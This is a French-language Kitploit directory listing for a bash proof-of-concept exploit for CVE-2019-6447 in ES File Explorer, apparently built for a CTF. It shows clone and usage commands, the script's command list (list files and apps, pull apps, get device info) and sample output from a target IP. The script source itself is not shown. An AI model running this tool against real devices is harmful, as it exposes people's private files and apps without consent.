Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
POC-ES-File-Explorer-CVE-2019-6447 — Script bash très basique pour exploiter la CVE-2019-6447. | Kitploit
Outils/GitHubGitHub/julio-cfa/poc-es-file-explorer-cve-2019-6447
Sécurité AndroidAnalyse des VulnérabilitésExploitationExfiltration de DonnéesCollecte d'InformationsSécurité Mobile
GitHubjulio-cfa/poc-es-file-explorer-cve-2019-6447

POC-ES-File-Explorer-CVE-2019-6447

Script bash très basique pour exploiter la CVE-2019-6447.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 4 ansPas encore vérifié

PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

Il s'agit d'une implémentation très simple en bash du CVE-2019-6447 PoC. Il utilise essentiellement curl pour envoyer les requêtes avec les bons paramètres. Je l'ai construit car je cherchais un script similaire lors d'un CTF et n'en ai trouvé aucun. Vous pouvez jouer avec le script original et le personnaliser à votre guise.

Installation:

Clonez simplement le dépôt et utilisez le fichier .sh.

root@kitploit:~
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

Ou copiez et collez le contenu brut dans un fichier.

Utilisation:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audios
listApps	List all applications installed
listAppsSystem	List system apps
listAppsPhone	List communication related applications
listAppsSdcard	List the apps installed on the sd card
listAppsAll	List all applications
getAppThumbnail	List icons for the specified application
appLaunch	Start the developed application
appPull         Download an application from your device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

Exemple:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]

Références:

Si vous êtes curieux de savoir comment cet exploit fonctionne en coulisses OU s'il échoue et que vous devez construire votre propre script, vous pouvez consulter les liens suivants :

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

Télécharger l’outil